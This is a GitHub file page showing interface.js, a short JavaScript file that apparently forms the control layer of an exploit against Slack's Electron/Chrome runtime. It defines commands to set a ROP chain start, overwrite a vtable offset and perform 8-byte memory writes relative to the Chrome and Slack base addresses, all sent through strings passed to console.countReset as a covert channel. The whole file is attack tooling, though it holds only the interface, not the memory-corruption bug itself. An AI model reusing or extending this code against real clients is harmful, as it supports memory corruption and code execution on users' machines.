-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathinterface.js
More file actions
45 lines (35 loc) · 1.06 KB
/
interface.js
File metadata and controls
45 lines (35 loc) · 1.06 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
const CMD_SET_ROP_START = 0;
const CMD_SET_OFFSET_VTABLE = 1;
const CMD_WRITE8 = 2;
const CMD_WRITE8_CHROME_BASE_PLUS_VALUE = 3;
const CMD_WRITE8_SLACK_BASE_PLUS_VALUE = 4;
const CMD_WRITE8_SLACK_BASE_ALIGNED = 5;
const CMD_START = 6;
function int64(num) {
return ("0000000000000000"+(BigInt(num).toString(16))).slice(-16);
}
function control(cmd, arg="") {
let s = int64(cmd) + arg;
console.countReset(s);
}
function set_rop_start(addr) {
control(CMD_SET_ROP_START, int64(addr));
}
function set_offset_vtable(offset) {
control(CMD_SET_OFFSET_VTABLE, int64(offset));
}
function write8(offset, val) {
control(CMD_WRITE8, int64(offset)+int64(val));
}
function write8_chrome_base_plus_val(offset, val) {
control(CMD_WRITE8_CHROME_BASE_PLUS_VALUE, int64(offset)+int64(val));
}
function write8_slack_base_plus_val(offset, val) {
control(CMD_WRITE8_SLACK_BASE_PLUS_VALUE, int64(offset)+int64(val));
}
function write8_slack_base_aligned(offset) {
control(CMD_WRITE8_SLACK_BASE_ALIGNED, int64(offset));
}
function start() {
control(CMD_START);
}